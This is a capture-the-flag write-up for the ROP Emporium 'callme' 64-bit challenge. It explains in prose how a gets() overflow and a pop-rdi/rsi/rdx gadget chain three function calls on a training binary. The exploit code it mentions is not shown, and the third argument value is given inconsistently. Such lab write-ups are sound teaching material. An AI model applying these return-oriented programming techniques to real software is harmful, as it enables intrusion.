ROP Emporium Callme (64 Bit) Writeup

This is the 3rd challenge in ROP Emporium and it does get a bit tricky from here. I had to call 3 functions and each function has 3 arguments “0xdeadbeef”, “0xcafebabe”, “0xd00df00d”. So let’s get started with the challenge.

First I start the challenge by checking the type of file the given binary is.

Next, I check the memory protection in the binary by using “checksec”

Now I had to check the functions present in the binary. I used rabin2 to get the details.

rabin2 -i “binary_name”

I noticed last time that rabin2 and gdb don’t give all the functions in the binary. So I used this tool called objdump. This gave every function present in the binary. Once again usefulFunction() wasn’t displayed in rabin2 and gdb :(

As per the hint given on the website, the functions to be called are “callme1()”, “callme2()”, “callme3()”.On further analyzing the binary, I found that the main function calls pwnme(). pwnme() has a gets() which I use to exploit this challenge.

I had to find the offset value to overwrite the buffer, padding, and ebp. To do this, I used “pattern create” in gdb-peda. Then I used this pattern as input after running the binary inside gdb-peda.

Here we don't get the overwritten value directly from RIP, We need to check the overwritten value in RBP. Find the offset value for it and then add 8.

So 32 + 8 = 40 bytes of Random characters to overwrite the buffer, padding, and RBP. Now I had to find the address of “callme1()”, “callme2()”, “callme3()” functions. I directly used the one we got in rabin2 back in picture 3.This is where things take a turn. How do we send 3 arguments in EIP? A quick search in google about 64bits architecture on passing arguments gives a clear view. We need to preload the value in the registers. The registers that needs to be used here can be found in usefulFunctions().

So RDX, RSI , RDI are the register used to preload the arguments. We need to find a gadget that would help popping these values. For this I used ROP gadget.

The 3rd one is perfect for us to preload the value. Now I tried developing the logic. First I need to overwrite the buffer, padding, and RBP to reach RIP. Then I had to preload the value. So I call the gadget and then 3 arguments “0xdeadbeef”, “0xcafebabe”, “0xc00df00d” . Finally I call the function callme1(). I repeat this for other 2 functions as well. So here is my exploit. Refer to my previous blogs on how to draw the stack diagram for this.

The hint is given on why we use 0xdeadbeefdeadbeef, and similarly other arguments in the website. Executing the above code should give me the flag.

WE HAVE OUR FLAG!

Hope you understood the challenge. Do check out my other blogs.

Don’t forget to give some claps if you reached here :) Follow me for more write-ups.

Goodbye:)